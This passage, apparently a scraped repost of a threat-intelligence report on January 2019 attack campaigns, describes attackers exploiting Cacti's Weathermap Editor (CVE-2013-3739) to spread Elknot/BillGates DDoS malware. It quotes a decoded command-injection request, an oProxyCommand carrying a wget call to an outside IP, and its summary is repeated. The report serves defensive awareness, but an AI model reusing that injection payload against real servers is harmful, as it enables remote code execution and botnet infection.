Vulnerabilities, Exploits, and Malware Driving Attack Campaigns in January 2019
- by nlqip
After the vulnerable server decodes the string, it is instructed to download a malicious file. The malicious request after decoding is:
oProxyCommand= wget http://185.29.8.28/down.php&port=143&user=sdf&passwd=sadf&server_type=imap&f_submit=Submit.
Again, in this case the threat actor took down the malicious file download.php before the researchers could download it to analyze.
Weathermap Editor (cacti plugin) Arbitrary Code Execution (CVE-2013-3739)
Another known threat actor was detected trying to exploit the PHP Weathermap Editor Cacti plugin. This vulnerability was first disclosed in April 2013. The threat actor attacks the vulnerability in PHP Weathermap and tries to download and execute a variant of Elknot/BillGates malware. Elknot is an infamous DDoS botnet family that runs on Linux and Windows systems. This malware, first detected in 2014, is used to launch DDoS attacks and seems to be spreading again. The attack vectors available within the malware include: ICMP flood, TCP flood, UDP flood, SYN flood, HTTP flood (Layer7), and DNS reflection floods. As we can see in Figure 8, 33 engines on VirusTotal.com detected this file as malicious.
Source link
lol
After the vulnerable server decodes the string, it is instructed to download a malicious file. The malicious request after decoding is: oProxyCommand= wget http://185.29.8.28/down.php&port=143&user=sdf&passwd=sadf&server_type=imap&f_submit=Submit. Again, in this case the threat actor took down the malicious file download.php before the researchers could download it to analyze. Weathermap Editor (cacti plugin) Arbitrary Code Execution (CVE-2013-3739) Another known…
Recent Posts
- Discord rolls out end-to-end encryption for audio, video calls
- Europol takes down “Ghost” encrypted messaging platform used for crime
- Phison President Promises AI Training, Tuning With A $50K Workstation
- Canary Trap’s Bi-Weekly Cyber Roundup – Canary Trap
- Cisco CX Leader Denzil Samuels Leaves For Solution Provider Behemoth NTT Data